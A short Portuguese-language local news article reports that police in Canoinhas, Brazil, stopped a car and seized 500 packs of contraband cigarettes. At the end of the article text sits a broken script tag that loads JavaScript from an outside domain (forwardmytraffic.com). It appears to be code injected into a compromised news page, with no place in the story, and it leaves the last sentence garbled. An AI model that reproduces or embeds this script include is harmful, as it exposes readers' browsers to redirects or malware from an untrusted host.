InícioDestaquePM Intercepta Contrabando de Cigarros

PM Intercepta Contrabando de Cigarros

Últimas notícias

Mulher sofre tentativa de homicídio em padaria no centro de Canoinhas

Na manhã dessa quinta-feira, 10, os bombeiros e polícia...

Alerta: Golpe do MEI

Atenção Microempreendedores Individuais! Os golpes estão cada vez mais...

Três Barras inicia campanha de vacinação contra a gripe

A Prefeitura de Três Barras, por meio da Secretaria...

Na quarta-feira, 30, por volta das 17h30, equipes da PM de Canoinhas realizavam uma operação barreira, na Rua Wendelin Metzger, próximo a Rua José Nunes Cavalheiro, no distrito de Marcilio Dias, quando abordou o veículo Ford KA, placas de Joinville.

 

 

Após busca veicular, foi encontrado, no porta malas 50 pacotes de cigarro de origem ilícita, descaminho, com um total de 500 carteiras de cigarro. O abordado relatou que pegou os cigarros de uma terceira pessoa e que havia buscado os produtos na casa dessa pessoa.

 

Diante dos fatos os cigarros foram apreendidos, lavrado boletim de ocorrência, o veículo foi removido ao pátio conveniado, pois estava com o licenciamento atrasado e após todo o procedimento o homem foi liberado…. src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe A Gazeta Tresbarrense
Equipe A Gazeta Tresbarrense
Somos um jornal regional com mais de 20 anos de existência.